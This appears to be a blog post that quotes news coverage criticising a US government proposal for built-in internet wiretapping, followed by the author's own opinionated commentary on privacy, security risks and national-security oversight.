Silicon Valley was taken by surprise by the announcement, suggesting that officials didn't even think to include technology companies in the discussion. Maybe if they had, they wouldn't have come up with such a drastic, odious and cumbersome proposal.

Officials' reasoning is confusing, considering the enormous scope of interception capabilities and wiretapping authority they have already. Phone and broadband networks are already required to have interception capabilities. Investigators can often intercept communications at a switch offered by network companies."

"...But now they're claiming that it's not enough. They want all communication servers to have a way for them to intercept messages, and the capability to provide the government with the unencrypted text of private conversations.

Other countries have tried to implement or are implementing a similar set of draconian regulations - India, the United Arab Emirates, Saudi Arabia.

If inclusion in this group makes you uncomfortable, it should. These aren't countries with an established tradition of personal privacy laws. To follow in their footsteps is at odds with American legal tradition and American values. As citizens, we're outraged that officials think so little of the concept of privacy.

Creating a separate entry for governmental access raises serious security risks for average Americans as well. If companies purposely create an opening in their software that's easy for the government to enter, it will be even easier for hackers and criminal networks to worm in. That's what happened to the Greek government in 2005. Hackers took advantage of a legally mandated wiretap function to spy on Greek politicians."

San Francisco Chronicle - Internet monitoring plan threatens privacy

----

Obama can has interwebz wiretap?

----

Mercury News - Privacy advocates criticize government's online eavesdropping proposal
"This view that law enforcement is being left in the dark by technology is a myth," Rotenberg said. Government officials have a "lot of ways" to investigate crimes and terrorist threats.

"Now they want the additional benefit of the network being wiretap-friendly," he added. "We're saying that simply goes too far."

Encryption and peer-to-peer networking have become widely used on the Internet for everyday communications, advocates say. Online purchases, financial transactions and even e-mail messages are routinely encrypted these days. And some new laws setting privacy standards have encouraged the wide use of encryption for storing and transmitting health information and other electronic or online records."

----
New York Times - Internet Wiretapping Proposal Met With Silence

----

I can't say that I am happy with any proposal to grant unlimited, unscrutinised access to private communications. The clubby atmosphere and underlying political agendas of those involved in the so-called national security business leaves me highly uncomfortable with proposals for broad-brush monitoring.

It is far too slippery a slope, and these kinds of powers and abilities are often granted in a cone of deafening silence.

We as a free (ostensibly) people need to be very wary of such requests. I find it interesting how privacy rules are being cranked up for most other sectors, but so-called national security gets its way without a whimper and without oversight. The Right wing has managed to make all politicians afraid of speaking up for real freedom - for fear that those politicians will be called "weak on defense" or "weak on security" or "soft on terrorism".

And the North American and European public keeps quaffing its Soma and votes from a perspective of apathy, lack of knowledge, and fear of brown people and others who are "different". Because it's brown people who get extra searches and questioning, not "real Americans" or "real Canadians" as some politicians like to say.